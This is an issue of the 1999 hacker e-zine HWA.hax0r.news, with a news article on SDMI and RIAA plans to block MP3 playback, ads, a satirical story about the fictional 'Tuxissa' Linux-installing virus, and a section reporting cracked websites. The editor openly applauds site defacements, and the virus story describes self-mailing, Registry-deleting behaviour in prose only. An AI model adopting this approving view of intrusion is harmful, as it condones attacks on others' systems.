At last week's SDMI meeting in London, a handpicked committee proposed a plan that could force hardware and software developers to choose among wannabe SDMI, the de facto standard MP3, or a different compressed file format for the development of digital music players and similar hardware. SDMI backers want manufacturers to build a time-bomb trigger into their products that, when activated at a later date, would prevent users from downloading or playing non-SDMI-compliant music. The hardware would initially support MP3 and other compressed file formats, but a signal from the RIAA would activate the blocking trigger. Hardware and software developers that refuse to build in the switch would not have access to the SDMI specifications or the major-label music that will be made available when the specification is complete. According to a source who attended the SDMI meeting last week, participants discovered that the Internet and music industries have precious little in common. Coming to a consensus on the delivery of digital music may be all but impossible, said the source, who requested anonymity. Committee members from the technology industry were convinced that record labels don't "get" the Internet, where open standards are the norm. Others were upset that the subcommittee was so exclusive. Microsoft, Lucent, and a handful of PC manufacturers were the only technology companies present in sessions dominated by the RIAA and its record labels. "There was a lot of distaste around the room and loud conversations in the hallway with Leo [Leonardo Chiariglione, executive director of SDMI] and Cary [Sherman, senior executive vice president for the RIAA]," the source said. The RIAA refused to comment on the negotiations. "Ultimately, if it continues down this path, there will be an unworkable solution for the customers," said the SDMI source. "Will I buy a Rio that supports MP3, or possibly a Samsung player that does not? 
The labels are concerned about their distribution channels and how the stores will treat them. But while there are 30,000 titles in brick-and-mortar, the labels own 10 times that." Another source who attended the meeting, and who also asked to remain anonymous, said that PC and hardware makers are resisting the RIAA's plans because they see an immediate market for MP3-based players. Already there are many players on the street and under development, and the market for selling legitimate MP3 music and products is in its infancy. "This transition group asked the question, 'do we ban MP3s?' and the answer was a clear and resounding 'no' from PC makers. They are not going to drop support for MP3 anytime soon, and more and more manufacturers want to have players ready for Christmas," said the source. For other companies caught in the middle of the debate, the issues were not so clear-cut. "With companies like Sony, that sell both content and hardware and are on both sides of the battle, it's very interesting," the source said. The initial SDMI specification for portable players is due by the end of June, and a full-blown architecture by March 2000. There are several encryption and security companies currently working on the proposed trigger device that will present their solutions within the next few weeks. The next SDMI meeting is scheduled for next week in Washington. "This reminds me of the early days of the CD recording market, with all the different file formats and people jockeying for position. The same thing is happening here, but there are 250 participants," said Dave Ulmer, general manager of Adaptec's software products group, who was at the SDMI meeting in London. "There are companies that see their future hinging on being part of this SDMI solution, and others just want to know what it is." 
One source said that "there is no way in hell" that SDMI-compliant products will be ready for the Christmas season because "the individuals involved in these conversations are too concerned about their interests and [are] not looking for a real solution. Some guy with a digital kiosk wants everything for kiosks, and another guy with encryption wants his stuff in, and so on." Steve Grady, vice president of marketing at MP3 retailer GoodNoise, said that if the record labels don't put the consumer first in their architecture plans, piracy will only increase and the industry could ultimately lose out on new business opportunities on the Web. "The problem is that you're talking about consumers and people adopting a technology and using music in a certain way. But you have to stay focused on the consumer here. What you're competing against is free product, and that won't go away," Grady said. "Something better than MP3 will come along. The ability to move music around is key, and if you try to force something that has attributes they don't want, it won't be successful." While the SDMI specification may ultimately become the standard for the music industry, there is no guarantee that it has the inside track. During the past few weeks, recording industry companies have formed alliances that could undermine SDMI's acceptance. Lucent teamed up with the Universal Music Group, while Microsoft allied with Sony on content distribution deals. In the coming months, the SDMI equation could get even more complicated if the major labels decide to go their own way. "What's interesting is Universal and Sony. It's like the Oklahoma land rush with their marketing power and Microsoft's monopoly," said one source. "If they get the market to adopt their standard, it's wide open. I don't think SDMI has a lock on what the standard will be." "Welcome to the software business," was the general sentiment among sources who recalled the similar battles over standards within the Internet industry. 
"[It's] turning into the Unix battle of the music industry," said one source, who said that ultimately open standards will prevail. "Any company that tries [proprietary formats] realizes it fails. Look at IBM, one of the oldest computer companies, and they've embraced the Web. It's a hard lesson, and the labels may have to learn it." The RIAA has made it clear that it's willing to fight for its interests in the courts. It has the money and the muscle to try to convince technology companies and Internet music vendors to see things its way. But just the same, it may not win the battle. "There is a big gap in the way major labels think about the world and what's going on today on the Internet. For all the discussion on format battles, is there really a battle going on in the consumer space?" Grady said. "There is only one player right now, and it's MP3. The only battle is taking place is in meeting rooms. The Internet is a different environment, and the labels need to understand the culture and what you are dealing with here," Grady said. @HWA AD.S ADVERTI$ING. The HWA black market ADVERTISEMENT$. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ****************************************************************************** * * * ATTRITION.ORG http://www.attrition.org * * ATTRITION.ORG Advisory Archive, Hacked Page Mirror * * ATTRITION.ORG DoS Database, Crypto Archive * * ATTRITION.ORG Sarcasm, Rudeness, and More. * * * *****************************************************************************
Come.to/Canc0n99 !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! http://come.to/Canc0n99 http://come.to/Canc0n99 http://come.to/Canc0n99http:j http:/ 99 http:o http:/ login: sysadmin n99 httpi /come. password: tp://comn to/Can me.to/Cat c0n99 SYSTEM NEWS: Canc0n99 is looking for more speakers and Canc0n99h http:/ industry people to attend with booths and talks. 99 http:e /come. you could have a booth and presentation for the cost of p://comel http:/ little more than a doorprize (tba) contact us at our main n99http:i http:/ address for info hwa@press.usmc.net, also join the mailing n99http:s http:/ for updates. This is the first Canadian event of its type invalid t 403 Fo and will have both white and black hat attendees, come out logged! ! 404 Fi and shake hands with the other side... *g* mainly have some IP locked ome.to fun and maybe do some networking (both kinds). see ya there! hostname http:/ x99http:x o/Canc x.to/Canx http://come.to/Canc0n99 http://come.to/Canc0n99 http://come.to/Canc0n99http:x o/Canc0n99 http://come.to/Canc0n99 http://come.to/Canc0n99 http://come.to/Canx http://come.to/Canc0n99 http://come.to/Canc0n99 http://come.to/Canc0n99 Canc0n99 Canc0n99 !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! $$$?$$$?$$$?$$$?$$$?$$$?$$$?$$$?$$$?$$$?$?$??$??$??$????$$$?$$$?$$$?$$$?$$$?$$ ! ! $ $ ! *** IT HAS BEEN FOUR YEARS! *** FREE KEVIN MITNICK NOW!!!! ** ! $ $ ! ! $$$$?$$$?$$$?$$$?$$$?$$$?$$$?$$$?$$$?$$$?$?$??$??$??$????$$$?$$$?$$$?$$$?$$$?$ www.2600.com www.freekevin.com www.kevinmitnick.com www.2600.com www.freekevi n.com www.kevinmitnick.com www.2600.com www.freekevin.com www.kevinmitnick.co m www.2600.com ########################################ww.2600.com www.freeke vin.com www.kev# Support 2600.com and the Free Kevin #.com www.kevinmitnick. com www.2600.co# defense fund site, visit it now! . # www.2600.com www.free kevin.com www.k# FREE KEVIN! 
#in.com www.kevinmitnic k.com www.2600.########################################om www.2600.com www.fre ekevin.com www.kevinmitnick.com www.2600.com www.freekevin.com www.kevinmitnic k.com www.2600.com www.freekevin.com www.kevinmitnick.com www.2600.com www.fre www.2600.com

One of our sponsors, visit them now www.csoft.net

*****************************************************************************
* WWW.BIZTECHTV.COM/PARSE WEDNESDAYS AT 4:30PM EST, HACK/PHREAK CALL-IN WEBTV *
* JOIN #PARSE FOR LIVE PARTICIPATION IN SHOW CHAT OR THE WEBCHAT, AND WEBBOARD *
*****************************************************************************

*****************************************************************************
* WWW.2600.COM OFF THE HOOK LIVE NETCAST'S TUES SIMULCAST ON WBAI IN NYC @8PM *
*****************************************************************************

//////////////////////////////////////////////////////////////////////////////
// To place an ad in this section simply type it up and email it to //
// hwa@press.usmc.net, put AD! in the subject header please. - Ed //
//////////////////////////////////////////////////////////////////////////////

@HWA

HA.HA Humour and puzzles ...etc
~~~~~~~~~~~~~~~~~~~~~~~~~

Don't worry. worry a *lot*

Attack of the Tuxissa Virus
March 29, 1999

What started out as a prank posting to comp.os.linux.advocacy yesterday has turned into one of the most significant viruses in computing history. The creator of the virus, who goes by the moniker "Anonymous Longhair", modified the well-known Melissa[1] virus to download and install Linux on infected machines. "It's a work of art," one Linux advocate told Humorix after he looked through the Tuxissa virus source code. "This virus goes well beyond the feeble troublemaking of Melissa."
The advocate enumerated some of the tasks the virus performs in the background while the user is blissfully playing Solitaire: Once the virus is activated, it first works on propagating itself. It has a built-in email harvesting module that downloads all the pages referenced in the user's Internet Explorer bookmarks and scans them for email addresses. Using Outlook, the virus sends a copy of itself to every email address it comes across. After it has successfully reproduced, the virus begins the tricky process of upgrading the system to Linux. First, the virus modifies AUTOEXEC.BAT so that the virus will be re-activated if the system crashes or is shut down while the upgrade is in process. Second, the virus downloads a stripped-down Slackware distribution, using a lengthy list of mirror sites to prevent the virus from overloading any one server. Then the virus configures a UMSDOS filesystem to install Linux on. Since this filesystem resides on a FAT partition, there is no need to re-partition the hard drive, one of the few actions that the Word macro language doesn't allow. Next, the virus uncompresses the downloaded files into the new Linux filesystem. The virus then permanently deletes all copies of the Windows Registry, virtually preventing the user from booting into Windows without a re-install. After modifying the boot sector, the virus terminates its own life by rebooting the system. The computer boots into the Slackware setup program, which automatically finishes the installation of Linux. Finally, the dazed user is presented with the Linux login prompt and the text, "Welcome to Linux. You'll never want to use Windows again. Type 'root' to begin..." The whole process takes about two hours, assuming the user has a decent Internet connection. Since the virus runs invisibly in the background, the user has no chance to stop it until it's too late. The email message that the virus is attached to has the subject "Important Message About Windows Security".
The text of the body says, "I want to let you know about some security problems I've uncovered in Windows 95/98/NT, Office 95/97, and Outlook. It's critically important that you protect your system against these attacks. Visit these sites for more information..." The rest of the message contains 42 links to sites about Linux and free software. Slashdot is one of those links. "That could spell trouble," one Slashdot expert told Humorix. "Slashdot could fall victim to the new 'Macro Virus Effect' if this virus continues to propagate at its present exponential growth rate. Red Hat's portal site, another site present on the virus' links list, seems to be quite sluggish right now..." Details on how the virus started are a bit sketchy. The "Anonymous Longhair" who created it only posted it to Usenet as an early April Fool's gag, a demonstration of how easy it would be to mount a "Linux revolution". Some other Usenet reader is responsible for actually spreading the virus into the wild. One observer speculated, "I imagine the virus was first sent to the addresses of several well-known spammers. The virus probably latched on to the spammer's email lists and began propagating at a fantastic rate. With no boundary to its growth, this thing could wind up infecting every single Net-connected Wintel box in the world. Wouldn't that be a shame!" Linus Torvalds, who just left for a two week vacation, was unavailable for comment at press time. We have a strong feeling that his vacation will be cut short very soon...

[1] http://linuxtoday.com/stories/4463.html

--- James S. Baughn http://i-want-a-website.com/about-linux/

@HWA

SITE.1 http://smog.cjb.net/
~~~~~~~~~~~~~~~~~~~~

Smogzer's site.
This site has news bytes from a wide range of interesting areas, from science and techno to security; everything from Sony's new robot dog to the new Windump (the Windows version of tcpdump) is reported here. Check it out... the graphics are pleasing and the site is well laid out. Go there now, you know you want to...

http://smog.cjb.net/

@HWA

H.W Hacked websites
~~~~~~~~~~~~~~~~

Note: The hacked site reports stay, especially with some cool hits by groups like *H.A.R.P, go get em boyz, racism is a mug's game! - Ed

* Hackers Against Racist Propaganda (See issue #7)

Haven't heard from Catharsys in a while; for those following their saga, visit http://frey.rapidnet.com/~ptah/ for 'the story so far'...

May 10th

Over the weekend some people were really busy...

From HNN's rumour section
http://www.hackernews.com/
contributed by Anonymous

Cracked

It has been a busy weekend for some. Plenty of military and government servers and quite a few new names popping up. A smattering of international servers and even mass domain cracks. Here is the loooong list of servers that have been reported as cracked.
May 11th

From HNN rumours section

Cracked

The following sites have been reported to HNN as cracked.

May 12th

From HNN rumours section
contributed by Anonymous

Cracked

The following sites have been reported as cracked.
May 13th

From HNN rumours section; contributed by Anonymous

Cracked

The following sites have been reported to HNN as cracked.

May 14th

contributed by Anonymous

Cracked

The following sites have been reported as cracked.

-------------------------------------------------------------------------

A.0 APPENDICES
_________________________________________________________________________

A.1 PHACVW, sekurity, security, cyberwar links
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

The links are no longer maintained in this file; there is now a links section at the http://welcome.to/HWA.hax0r.news/ url, so check there for current links etc.

The hack FAQ (The #hack/alt.2600 faq)
http://www-personal.engin.umich.edu/~jgotts/underground/hack-faq.html

Hacker's Jargon File (The quote file)
http://www.lysator.liu.se/hackdict/split2/main_index.html

New Hacker's Jargon File.
http://www.tuxedo.org/~esr/jargon/

HWA.hax0r.news Mirror Sites:
~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://www.csoft.net/~hwa/
http://www.digitalgeeks.com/hwa
http://members.tripod.com/~hwa_2k
http://welcome.to/HWA.hax0r.news/
http://www.attrition.org/~modify/texts/zines/HWA/
http://www.genocide2600.com/~tattooman/zines/hwahaxornews/
http://archives.projectgamma.com/zines/hwa/
http://www.403-security.org/Htmls/hwa.hax0r.news.htm

International links:(TBC)
~~~~~~~~~~~~~~~~~~~~~~~~~

Foreign correspondents and others, please send in news site links that have security news from foreign countries for inclusion in this list, thanks... - Ed

Belgium.......: http://bewoner.dma.be/cum/
Brasil........: http://www.psynet.net/ka0z
                http://www.elementais.cjb.net
Colombia......: http://www.cascabel.8m.com
                http://www.intrusos.cjb.net
Indonesia.....: http://www.k-elektronik.org/index2.html
                http://members.xoom.com/neblonica/
                http://hackerlink.or.id/
Netherlands...: http://security.pine.nl/
Russia........: http://www.tsu.ru/~eugene/
Singapore.....: http://www.icepoint.com

Got a link for this section? Email it to hwa@press.usmc.net and I'll review it and post it here if it merits it.

@HWA

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-
--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--
© 1998, 1999 (c) Cruciphux/HWA.hax0r.news (R) { w00t }
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-
[ 28 63 29 20 31 39 39 39 20 63 72 75 63 69 70 68 75 78 20 68 77 61 ]
[45:6E:64]-[28:63:29:31:39:39:38:20:68:77:61:20:73:74:65:76:65]